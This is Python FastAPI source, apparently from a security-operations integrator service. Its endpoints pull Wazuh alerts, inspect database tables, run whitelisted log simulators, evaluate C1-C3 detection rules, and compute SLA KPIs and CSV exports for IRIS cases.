  1429. ) -> ApiResponse:
  1430. try:
  1431. result = await wazuh_adapter.list_manager_logs(
  1432. limit=limit, offset=offset, q=q, sort=sort
  1433. )
  1434. except Exception as exc:
  1435. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1436. return ApiResponse(data={"wazuh": result})
  1437. @app.post(
  1438. "/wazuh/sync-to-mvp",
  1439. response_model=ApiResponse,
  1440. dependencies=[Depends(require_internal_api_key)],
  1441. summary="Sync Wazuh to MVP",
  1442. description="Fetch Wazuh alerts from indexer and pass them through MVP ingest/evaluation logic.",
  1443. )
  1444. async def wazuh_sync_to_mvp(
  1445. limit: int = 50,
  1446. minutes: int = 120,
  1447. q: str = "soc_mvp_test=true OR event_type:*",
  1448. ) -> ApiResponse:
  1449. try:
  1450. result = await mvp_service.sync_wazuh_alerts(query=q, limit=limit, minutes=minutes)
  1451. except Exception as exc:
  1452. raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc
  1453. return ApiResponse(data={"sync": result})
  1454. @app.get(
  1455. "/wazuh/auto-sync/status",
  1456. response_model=ApiResponse,
  1457. summary="Wazuh auto-sync status",
  1458. description="Show auto-sync enablement, settings, task runtime state, and last sync result.",
  1459. )
  1460. async def wazuh_auto_sync_status() -> ApiResponse:
  1461. state = getattr(app.state, "wazuh_auto_sync_state", {})
  1462. task = getattr(app.state, "wazuh_auto_sync_task", None)
  1463. return ApiResponse(
  1464. data={
  1465. "enabled": settings.wazuh_auto_sync_enabled,
  1466. "task_running": bool(task and not task.done()),
  1467. "settings": {
  1468. "interval_seconds": settings.wazuh_auto_sync_interval_seconds,
  1469. "limit": settings.wazuh_auto_sync_limit,
  1470. "minutes": settings.wazuh_auto_sync_minutes,
  1471. "query": settings.wazuh_auto_sync_query,
  1472. },
  1473. "state": state,
  1474. }
  1475. )
@app.get(
    "/monitor/db/tables",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="List database tables",
    description="List soc-integrator PostgreSQL tables with row count and relation size.",
)
async def monitor_db_tables() -> ApiResponse:
    """Enumerate public-schema tables with estimated and exact row counts.

    Catalog metadata (pg_tables joined to pg_stat_user_tables) provides the
    estimate and relation size in one query; an exact COUNT(*) is then run
    per table.  Identifiers are composed with psycopg ``sql.Identifier``,
    so catalog-sourced names cannot inject SQL.

    NOTE(review): COUNT(*) per table can be slow on very large relations —
    acceptable here because this is an internal monitoring endpoint.
    """
    rows: list[dict[str, object]] = []
    with get_conn() as conn, conn.cursor() as cur:
        cur.execute(
            """
            SELECT
                t.schemaname,
                t.tablename,
                COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
                COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
                COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
            FROM pg_tables t
            LEFT JOIN pg_stat_user_tables s
                ON s.schemaname = t.schemaname
                AND s.relname = t.tablename
            WHERE t.schemaname = 'public'
            ORDER BY t.tablename
            """
        )
        # Materialize the catalog rows first so the same cursor can be
        # reused for the per-table COUNT(*) queries below.
        tables = cur.fetchall()
        for item in tables:
            schema = str(item.get("schemaname") or "public")
            table = str(item.get("tablename") or "")
            if not table:
                continue
            cur.execute(
                sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
                    sql.Identifier(schema),
                    sql.Identifier(table),
                )
            )
            count_row = cur.fetchone() or {}
            row_count = int(count_row.get("cnt", 0) or 0)
            rows.append(
                {
                    "schema": schema,
                    "table": table,
                    "row_count": row_count,
                    "estimated_rows": int(item.get("estimated_rows", 0) or 0),
                    "size_bytes": int(item.get("size_bytes", 0) or 0),
                    "size_pretty": str(item.get("size_pretty") or "0 bytes"),
                }
            )
    return ApiResponse(
        data={
            "database": settings.soc_integrator_db_name,
            "generated_at": datetime.now(timezone.utc).isoformat(),
            "tables": rows,
        }
    )
@app.get(
    "/monitor/db/tables/{table_name}/rows",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="List rows from selected table",
    description="Return rows from a selected public table with pagination.",
)
async def monitor_db_table_rows(
    table_name: str,
    limit: int = 50,
    offset: int = 0,
) -> ApiResponse:
    """Page through rows of one public-schema table.

    The requested name is validated against pg_tables before any use, and
    identifiers are composed via psycopg ``sql.Identifier`` — user input
    never reaches the query as raw SQL.  The page size is clamped to 1..500.

    Raises 400 for an empty name and 404 when the table does not exist.
    """
    table = str(table_name or "").strip()
    if not table:
        raise HTTPException(status_code=400, detail="table_name is required")
    page_limit = max(1, min(int(limit), 500))
    page_offset = max(0, int(offset))
    with get_conn() as conn, conn.cursor() as cur:
        # Existence check doubles as a whitelist against arbitrary names.
        cur.execute(
            """
            SELECT 1
            FROM pg_tables
            WHERE schemaname = 'public' AND tablename = %s
            LIMIT 1
            """,
            (table,),
        )
        if not cur.fetchone():
            raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
        cur.execute(
            sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
                sql.Identifier("public"),
                sql.Identifier(table),
            )
        )
        total_row = cur.fetchone() or {}
        total = int(total_row.get("cnt", 0) or 0)
        # ORDER BY 1 DESC: newest-first assuming the first column is a
        # monotonically increasing id — TODO confirm this holds for all tables.
        cur.execute(
            sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
                sql.Identifier("public"),
                sql.Identifier(table),
            ),
            (page_limit, page_offset),
        )
        rows = [dict(item) for item in (cur.fetchall() or [])]
    return ApiResponse(
        data={
            "table": table,
            "limit": page_limit,
            "offset": page_offset,
            "total": total,
            "rows": rows,
        }
    )
@app.get(
    "/monitor/systems",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="Systems monitor overview",
    description="Unified monitoring snapshot for Wazuh, Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.",
)
async def monitor_systems(
    minutes: int = 60,
    limit: int = 20,
    include_raw: bool = False,
) -> ApiResponse:
    """Build one dashboard snapshot: per-system status cards plus pipeline KPIs.

    Dependency health, DB-derived counters, and best-effort "recent rows"
    fetches are combined into four cards (wazuh/shuffle/iris/pagerduty).
    A failed recent-rows fetch degrades the card, never the response.

    ``last_ok_at`` per system is tracked in ``app.state`` — in-process only,
    so it resets on restart.
    """
    window_minutes = max(1, minutes)
    row_limit = max(1, limit)
    now = datetime.now(timezone.utc)
    since = now - timedelta(minutes=window_minutes)
    now_iso = now.isoformat()
    # Health probe for all downstream systems (status/latency/details per key).
    dependencies = await mvp_service.dependency_health()
    monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}})
    last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {})
    # KPI counters from persisted database records in the selected lookback window.
    alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh")
    detections_matched = repo.count_c_detection_events_since(since=since)
    iris_tickets_created = repo.count_incidents_with_iris_since(since=since)
    pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True)
    pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False)
    # Recent rows per system are best-effort: errors are captured per card.
    wazuh_recent: list[object] = []
    wazuh_recent_error: str | None = None
    try:
        wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None)
        wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit]
    except Exception as exc:
        wazuh_recent_error = str(exc)
    shuffle_recent: list[object] = []
    shuffle_recent_error: str | None = None
    try:
        workflows_resp = await shuffle_adapter.list_workflows()
        workflows = _extract_first_array(workflows_resp)
        for item in workflows[:row_limit]:
            if isinstance(item, dict):
                # Project workflow dicts down to a compact id/name/status view.
                shuffle_recent.append(
                    {
                        "id": item.get("id") or item.get("workflow_id"),
                        "name": item.get("name") or item.get("workflow", {}).get("name"),
                        "status": item.get("status"),
                    }
                )
            else:
                shuffle_recent.append(item)
    except Exception as exc:
        shuffle_recent_error = str(exc)
    iris_recent: list[object] = []
    iris_recent_error: str | None = None
    try:
        iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0)
        iris_recent = _extract_first_array(iris_resp)[:row_limit]
    except Exception as exc:
        iris_recent_error = str(exc)
    pagerduty_recent = repo.list_recent_escalations(limit=row_limit)

    def build_card(
        label: str,
        dependency_key: str,
        recent: list[object],
        kpis: dict[str, object],
        extra_error: str | None = None,
    ) -> dict[str, object]:
        # Assemble one card: dependency health + recent rows + KPI counters.
        dep = dependencies.get(dependency_key, {})
        dep_status = str(dep.get("status") or "down")
        status = "ok" if dep_status == "up" else "down"
        if dep_status == "up":
            # Side effect: refresh the shared last-seen-healthy timestamp.
            last_ok_at_by_key[label] = now_iso
        error_parts: list[str] = []
        if dep.get("error"):
            error_parts.append(str(dep.get("error")))
        if extra_error:
            error_parts.append(extra_error)
        # Healthy dependency but failed recent-rows fetch -> "degraded".
        if dep_status == "up" and extra_error:
            status = "degraded"
        card: dict[str, object] = {
            "status": status,
            "latency_ms": dep.get("latency_ms"),
            "last_ok_at": last_ok_at_by_key.get(label),
            "last_error": " | ".join(error_parts) if error_parts else None,
            "kpis": kpis,
            "recent": recent,
        }
        if include_raw:
            card["raw"] = dep.get("details")
        return card

    cards = {
        "wazuh": build_card(
            label="wazuh",
            dependency_key="wazuh",
            recent=wazuh_recent,
            extra_error=wazuh_recent_error,
            kpis={
                "alerts_ingested": alerts_ingested,
                "recent_rows": len(wazuh_recent),
            },
        ),
        "shuffle": build_card(
            label="shuffle",
            dependency_key="shuffle",
            recent=shuffle_recent,
            extra_error=shuffle_recent_error,
            kpis={
                "recent_workflows": len(shuffle_recent),
            },
        ),
        "iris": build_card(
            label="iris",
            dependency_key="iris",
            recent=iris_recent,
            extra_error=iris_recent_error,
            kpis={
                "tickets_created": iris_tickets_created,
                "recent_rows": len(iris_recent),
            },
        ),
        "pagerduty": build_card(
            label="pagerduty",
            dependency_key="pagerduty_stub",
            recent=pagerduty_recent,
            kpis={
                "escalations_sent": pagerduty_escalations_sent,
                "escalations_failed": pagerduty_escalations_failed,
            },
        ),
    }
    # Persist updated last_ok_at map back onto app.state for the next request.
    app.state.systems_monitor_state = monitor_state
    return ApiResponse(
        data={
            "generated_at": now_iso,
            "window_minutes": window_minutes,
            "cards": cards,
            "pipeline": {
                "alerts_ingested": alerts_ingested,
                "detections_matched": detections_matched,
                "iris_tickets_created": iris_tickets_created,
                "pagerduty_escalations_sent": pagerduty_escalations_sent,
                "pagerduty_escalations_failed": pagerduty_escalations_failed,
            },
        }
    )
  1731. @app.get(
  1732. "/sim/logs/runs",
  1733. response_model=ApiResponse,
  1734. dependencies=[Depends(require_internal_api_key)],
  1735. summary="List simulator runs",
  1736. description="List active and recent simulator script runs started from soc-integrator.",
  1737. )
  1738. async def sim_logs_runs() -> ApiResponse:
  1739. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1740. items: list[dict[str, object]] = []
  1741. for run_id, run in sim_runs.items():
  1742. serialized = _serialize_sim_run(run_id, run)
  1743. if (not serialized["running"]) and not run.get("stopped_at"):
  1744. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1745. serialized["stopped_at"] = run["stopped_at"]
  1746. items.append(serialized)
  1747. items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True)
  1748. return ApiResponse(data={"items": items})
  1749. @app.post(
  1750. "/sim/logs/start",
  1751. response_model=ApiResponse,
  1752. dependencies=[Depends(require_internal_api_key)],
  1753. summary="Start simulator logs script",
  1754. description="Start a whitelisted simulator script in background and return run metadata.",
  1755. )
  1756. async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse:
  1757. script_name = SIM_SCRIPT_MAP[payload.script]
  1758. script_path = SIM_SCRIPTS_DIR / script_name
  1759. if not script_path.exists():
  1760. raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}")
  1761. cmd = _build_sim_command(payload)
  1762. env = dict(os.environ)
  1763. env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager")
  1764. env.setdefault("WAZUH_SYSLOG_PORT", "514")
  1765. run_id = str(uuid.uuid4())
  1766. log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log"
  1767. log_handle = None
  1768. try:
  1769. log_handle = log_file.open("ab")
  1770. process = subprocess.Popen(
  1771. cmd,
  1772. cwd=str(SIM_SCRIPTS_DIR),
  1773. env=env,
  1774. stdout=log_handle,
  1775. stderr=subprocess.STDOUT,
  1776. start_new_session=True,
  1777. )
  1778. except Exception as exc:
  1779. if log_handle:
  1780. try:
  1781. log_handle.close()
  1782. except Exception:
  1783. pass
  1784. raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc
  1785. finally:
  1786. if log_handle:
  1787. log_handle.close()
  1788. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1789. sim_runs[run_id] = {
  1790. "script": payload.script,
  1791. "target": payload.target,
  1792. "scenario": payload.scenario,
  1793. "count": payload.count,
  1794. "delay_seconds": payload.delay_seconds,
  1795. "forever": payload.forever,
  1796. "pid": process.pid,
  1797. "cmd": " ".join(shlex.quote(part) for part in cmd),
  1798. "started_at": datetime.now(timezone.utc).isoformat(),
  1799. "stopped_at": None,
  1800. "return_code": None,
  1801. "log_file": str(log_file),
  1802. "process": process,
  1803. }
  1804. app.state.sim_runs = sim_runs
  1805. return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])})
  1806. @app.post(
  1807. "/sim/logs/stop/{run_id}",
  1808. response_model=ApiResponse,
  1809. dependencies=[Depends(require_internal_api_key)],
  1810. summary="Stop simulator run",
  1811. description="Stop a running simulator script by run_id.",
  1812. )
  1813. async def sim_logs_stop(run_id: str) -> ApiResponse:
  1814. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1815. run = sim_runs.get(run_id)
  1816. if not run:
  1817. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1818. process = run.get("process")
  1819. if process and process.poll() is None:
  1820. try:
  1821. process.terminate()
  1822. process.wait(timeout=3)
  1823. except subprocess.TimeoutExpired:
  1824. process.kill()
  1825. except Exception as exc:
  1826. raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc
  1827. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1828. return ApiResponse(data={"run": _serialize_sim_run(run_id, run)})
  1829. @app.post(
  1830. "/sim/logs/stop-running",
  1831. response_model=ApiResponse,
  1832. dependencies=[Depends(require_internal_api_key)],
  1833. summary="Stop all running simulator runs",
  1834. description="Stop all currently running simulator scripts (including forever mode).",
  1835. )
  1836. async def sim_logs_stop_running() -> ApiResponse:
  1837. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1838. stopped: list[dict[str, object]] = []
  1839. already_stopped = 0
  1840. for run_id, run in sim_runs.items():
  1841. process = run.get("process")
  1842. if process and process.poll() is None:
  1843. try:
  1844. process.terminate()
  1845. process.wait(timeout=3)
  1846. except subprocess.TimeoutExpired:
  1847. process.kill()
  1848. except Exception as exc:
  1849. raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc
  1850. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1851. stopped.append(_serialize_sim_run(run_id, run))
  1852. else:
  1853. already_stopped += 1
  1854. return ApiResponse(
  1855. data={
  1856. "stopped_count": len(stopped),
  1857. "already_stopped_count": already_stopped,
  1858. "runs": stopped,
  1859. }
  1860. )
  1861. @app.get(
  1862. "/sim/logs/output/{run_id}",
  1863. response_model=ApiResponse,
  1864. dependencies=[Depends(require_internal_api_key)],
  1865. summary="Get simulator run output",
  1866. description="Return tailed output lines from simulator run log file.",
  1867. )
  1868. async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse:
  1869. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1870. run = sim_runs.get(run_id)
  1871. if not run:
  1872. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1873. log_file_path = run.get("log_file")
  1874. if not log_file_path:
  1875. raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}")
  1876. log_file = Path(str(log_file_path))
  1877. lines = _tail_log_lines(log_file, limit=limit)
  1878. process = run.get("process")
  1879. running = bool(process and process.poll() is None)
  1880. return ApiResponse(
  1881. data={
  1882. "run_id": run_id,
  1883. "running": running,
  1884. "line_count": len(lines),
  1885. "lines": lines,
  1886. "text": "\n".join(lines),
  1887. "log_file": str(log_file),
  1888. }
  1889. )
  1890. @app.get(
  1891. "/sim/logs/wazuh-latest/{run_id}",
  1892. response_model=ApiResponse,
  1893. dependencies=[Depends(require_internal_api_key)],
  1894. summary="Get latest Wazuh logs/rules for simulator run",
  1895. description="Return latest Wazuh event logs and matched rules correlated to a simulator run.",
  1896. )
  1897. async def sim_logs_wazuh_latest(
  1898. run_id: str,
  1899. limit: int = 50,
  1900. minutes: int = 15,
  1901. include_raw: bool = False,
  1902. ) -> ApiResponse:
  1903. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1904. run = sim_runs.get(run_id)
  1905. if not run:
  1906. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1907. requested_minutes = max(1, int(minutes))
  1908. # Keep query unfiltered and use a wide lookback to emulate Discover "latest records".
  1909. effective_minutes = max(1440, requested_minutes)
  1910. query_limit = max(1, min(int(limit), 200))
  1911. query_text = "*"
  1912. try:
  1913. raw = await wazuh_adapter.search_alerts(
  1914. query=query_text,
  1915. limit=query_limit,
  1916. minutes=effective_minutes,
  1917. )
  1918. except Exception as exc:
  1919. raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc
  1920. hits = _extract_wazuh_hits(raw)
  1921. events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits]
  1922. rules: list[dict[str, object]] = []
  1923. for hit in hits:
  1924. rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw)
  1925. if rule_item:
  1926. rules.append(rule_item)
  1927. return ApiResponse(
  1928. data={
  1929. "run": _serialize_sim_run(run_id, run),
  1930. "query": {
  1931. "effective_minutes": effective_minutes,
  1932. "text": query_text,
  1933. "limit": query_limit,
  1934. },
  1935. "events": events,
  1936. "rules": rules,
  1937. "totals": {
  1938. "events": len(events),
  1939. "rules": len(rules),
  1940. },
  1941. }
  1942. )
  1943. @app.post(
  1944. "/monitor/log-loss/check",
  1945. response_model=ApiResponse,
  1946. dependencies=[Depends(require_internal_api_key)],
  1947. summary="Check log loss",
  1948. description="Check expected telemetry streams for missing logs in a configurable lookback window.",
  1949. )
  1950. async def monitor_log_loss_check(
  1951. payload: LogLossCheckRequest | None = None,
  1952. create_ticket: bool = False,
  1953. ) -> ApiResponse:
  1954. req = payload or LogLossCheckRequest()
  1955. result = await _execute_log_loss_check(req=req, create_ticket=create_ticket)
  1956. return ApiResponse(data=result)
@app.post(
    "/monitor/c-detections/evaluate",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="Evaluate Appendix C detections",
    description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.",
)
async def monitor_c_detections_evaluate(payload: CDetectionEvaluateRequest) -> ApiResponse:
    """Run the C1-C3 detection rules over recent Wazuh events.

    Flow: search Wazuh -> normalize hits -> evaluate detection rules ->
    persist each match, and (unless ``dry_run`` or the per-entity cooldown
    is active) ingest an incident which may create an IRIS ticket.

    Runtime status is mirrored into ``app.state.c_detection_state`` on both
    the success and failure paths; any failure becomes an HTTP 502.
    """
    if not settings.c_detection_enabled:
        raise HTTPException(status_code=400, detail="C detection is disabled by configuration")
    started_at = datetime.now(timezone.utc).isoformat()
    app.state.c_detection_state["last_started_at"] = started_at
    try:
        raw = await wazuh_adapter.search_alerts(
            query=payload.query,
            limit=max(1, payload.limit),
            minutes=max(1, payload.minutes),
        )
        # Defensive unwrap of the indexer response shape {"hits": {"hits": [...]}}.
        hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else []
        normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits]
        evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors)
        records: list[dict[str, object]] = []
        for match in evaluated.get("matches", []):
            usecase_id = str(match.get("usecase_id") or "")
            entity = str(match.get("entity") or "unknown")
            severity = str(match.get("severity") or "medium")
            evidence = dict(match.get("evidence") or {})
            # Minimal reference back to the triggering event for the DB row.
            event_ref = {
                "event_id": ((match.get("event") or {}).get("event_id")),
                "timestamp": ((match.get("event") or {}).get("timestamp")),
                "source": ((match.get("event") or {}).get("source")),
            }
            # Cooldown suppresses repeat tickets for the same usecase+entity.
            in_cooldown = repo.is_c_detection_in_cooldown(
                usecase_id=usecase_id,
                entity=entity,
                cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds),
            )
            incident_key: str | None = None
            # The match is always persisted, even when no incident is created.
            event_row = repo.add_c_detection_event(
                usecase_id=usecase_id,
                entity=entity,
                severity=severity,
                evidence=evidence,
                event_ref=event_ref,
                incident_key=None,
            )
            if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown:
                incident_event = _c_match_to_incident_event(match)
                ingest = await mvp_service.ingest_incident(incident_event)
                # Normalize empty string to None before linking it back.
                incident_key = str(ingest.get("incident_key") or "") or None
                repo.update_c_detection_incident(int(event_row["id"]), incident_key)
            records.append(
                {
                    "id": event_row["id"],
                    "usecase_id": usecase_id,
                    "entity": entity,
                    "severity": severity,
                    "incident_key": incident_key,
                    "cooldown_active": in_cooldown,
                    "evidence": evidence,
                }
            )
        result = {
            "query": payload.query,
            "minutes": max(1, payload.minutes),
            "selectors": payload.selectors,
            "dry_run": payload.dry_run,
            "summary": evaluated.get("summary", {}),
            "matches": records,
            "total_hits": len(hits),
        }
        app.state.c_detection_state["last_status"] = "ok"
        app.state.c_detection_state["last_result"] = result
        app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
        return ApiResponse(data=result)
    except Exception as exc:
        app.state.c_detection_state["last_status"] = "error"
        app.state.c_detection_state["last_error"] = str(exc)
        app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
        raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc
  2037. @app.get(
  2038. "/monitor/c-detections/history",
  2039. response_model=ApiResponse,
  2040. dependencies=[Depends(require_internal_api_key)],
  2041. summary="C detection history",
  2042. description="List persisted C1-C3 detection matches, including evidence and linked incident keys.",
  2043. )
  2044. async def monitor_c_detections_history(
  2045. limit: int = 50,
  2046. offset: int = 0,
  2047. usecase_id: str | None = None,
  2048. ) -> ApiResponse:
  2049. rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id)
  2050. return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id})
  2051. @app.get(
  2052. "/monitor/c-detections/state",
  2053. response_model=ApiResponse,
  2054. dependencies=[Depends(require_internal_api_key)],
  2055. summary="C detection state",
  2056. description="Return Appendix C detection settings and last evaluation runtime state.",
  2057. )
  2058. async def monitor_c_detections_state() -> ApiResponse:
  2059. return ApiResponse(
  2060. data={
  2061. "enabled": settings.c_detection_enabled,
  2062. "settings": {
  2063. "window_minutes": settings.c_detection_window_minutes,
  2064. "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph,
  2065. "c2_offhours_start_utc": settings.c2_offhours_start_utc,
  2066. "c2_offhours_end_utc": settings.c2_offhours_end_utc,
  2067. "c3_host_spread_threshold": settings.c3_host_spread_threshold,
  2068. "c3_scan_port_threshold": settings.c3_scan_port_threshold,
  2069. "create_iris_ticket": settings.c_detection_create_iris_ticket,
  2070. "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds,
  2071. },
  2072. "state": getattr(app.state, "c_detection_state", {}),
  2073. }
  2074. )
  2075. # ---------------------------------------------------------------------------
  2076. # KPI Timeout helpers and IRIS alert routes
  2077. # ---------------------------------------------------------------------------
  2078. SLA_SECONDS: dict[str, int] = {"High": 14400, "Medium": 28800, "Low": 86400}
  2079. def compute_kpi(
  2080. created_at: str,
  2081. severity_name: str,
  2082. resolved_at: str | None = None,
  2083. ) -> dict[str, object]:
  2084. sla = SLA_SECONDS.get(severity_name, 28800)
  2085. def _parse(ts: str) -> datetime:
  2086. dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
  2087. return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)
  2088. start = _parse(created_at)
  2089. thresholds = [("S1", "#22c55e", 25), ("S2", "#eab308", 50), ("S3", "#f97316", 75), ("S4", "#ef4444", 100)]
  2090. if resolved_at:
  2091. end = _parse(resolved_at)
  2092. elapsed = max(0, (end - start).total_seconds()) # clamp: close_date can't precede open_date
  2093. elapsed_pct = min(elapsed / sla * 100, 100)
  2094. kpi_pct = max(100 - elapsed_pct, 0)
  2095. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2096. return {
  2097. "kpi_pct": round(kpi_pct, 1),
  2098. "elapsed_pct": round(elapsed_pct, 1),
  2099. "status": "Resolved",
  2100. "segments": segments,
  2101. "resolved": True,
  2102. }
  2103. elapsed = (datetime.now(timezone.utc) - start).total_seconds()
  2104. elapsed_pct = min(elapsed / sla * 100, 100)
  2105. kpi_pct = max(100 - elapsed_pct, 0)
  2106. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2107. if kpi_pct >= 80:
  2108. status = "On Track"
  2109. elif kpi_pct >= 60:
  2110. status = "Watch"
  2111. elif kpi_pct >= 40:
  2112. status = "Warning"
  2113. elif kpi_pct >= 20:
  2114. status = "Urgent"
  2115. elif kpi_pct > 0:
  2116. status = "Critical"
  2117. else:
  2118. status = "Breached"
  2119. return {
  2120. "kpi_pct": round(kpi_pct, 1),
  2121. "elapsed_pct": round(elapsed_pct, 1),
  2122. "status": status,
  2123. "segments": segments,
  2124. "resolved": False,
  2125. }
  2126. def _enrich_alerts_with_kpi(iris_response: dict) -> dict:
  2127. """Inject kpi field into each alert row returned by IRIS.
  2128. IRIS GET /api/v2/alerts returns: { "total": N, "data": [...], ... }
  2129. """
  2130. alerts = iris_response.get("data", [])
  2131. if not isinstance(alerts, list):
  2132. return iris_response
  2133. for alert in alerts:
  2134. created_at = alert.get("alert_creation_time") or ""
  2135. severity = (alert.get("severity") or {}).get("severity_name", "Medium")
  2136. if not created_at:
  2137. continue
  2138. resolved_at: str | None = None
  2139. if alert.get("alert_resolution_status_id") is not None:
  2140. history: dict = alert.get("modification_history") or {}
  2141. if history:
  2142. last_ts = max(history.keys(), key=lambda k: float(k))
  2143. resolved_at = datetime.fromtimestamp(float(last_ts), tz=timezone.utc).isoformat()
  2144. try:
  2145. alert["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2146. except Exception:
  2147. alert["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2148. return iris_response
  2149. def _enrich_cases_with_kpi(iris_response: dict) -> dict:
  2150. # v2 cases list: { "data": [...], "total": N, ... }
  2151. # Each case uses open_date / close_date / state.state_name / severity_id
  2152. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} # severity_id → name
  2153. cases = iris_response.get("data") or iris_response.get("items", [])
  2154. if not isinstance(cases, list):
  2155. return iris_response
  2156. for case in cases:
  2157. created_at = case.get("open_date") or ""
  2158. if not created_at:
  2159. continue
  2160. sev_id = case.get("severity_id") or 1
  2161. severity = _CASE_SEV.get(int(sev_id), "Medium")
  2162. resolved_at = None
  2163. close_date = case.get("close_date")
  2164. state_name = ((case.get("state") or {}).get("state_name") or "").lower()
  2165. if close_date:
  2166. resolved_at = close_date
  2167. elif state_name == "closed":
  2168. resolved_at = created_at
  2169. try:
  2170. case["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2171. except Exception:
  2172. case["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2173. return iris_response
  2174. @app.get(
  2175. "/iris/cases/export-csv",
  2176. summary="Export IRIS cases as CSV",
  2177. description="Download all cases (up to 1000) with KPI as a CSV attachment.",
  2178. )
  2179. async def iris_export_cases_csv() -> StreamingResponse:
  2180. try:
  2181. raw = await iris_adapter.list_cases(limit=1000, offset=0)
  2182. except Exception as exc:
  2183. raise HTTPException(status_code=502, detail=f"IRIS case export failed: {exc}") from exc
  2184. enriched = _enrich_cases_with_kpi(raw)
  2185. cases = enriched.get("data") or enriched.get("items", [])
  2186. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"}
  2187. output = io.StringIO()
  2188. fieldnames = ["case_id", "case_name", "severity", "state", "open_date", "close_date", "kpi_pct", "kpi_status"]
  2189. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2190. writer.writeheader()
  2191. for case in cases:
  2192. kpi = case.get("kpi", {})
  2193. writer.writerow({
  2194. "case_id": case.get("case_id", ""),
  2195. "case_name": case.get("case_name", ""),
  2196. "severity": _CASE_SEV.get(int(case.get("severity_id") or 1), "Medium"),
  2197. "state": (case.get("state") or {}).get("state_name", ""),
  2198. "open_date": case.get("open_date", ""),
  2199. "close_date": case.get("close_date", ""),
  2200. "kpi_pct": kpi.get("kpi_pct", ""),
  2201. "kpi_status": kpi.get("status", ""),
  2202. })
  2203. output.seek(0)
  2204. return StreamingResponse(
  2205. iter([output.getvalue()]),
  2206. media_type="text/csv",
  2207. headers={"Content-Disposition": "attachment; filename=iris_cases.csv"},
  2208. )
  2209. @app.get(
  2210. "/iris/cases/{case_id}",
  2211. response_model=ApiResponse,
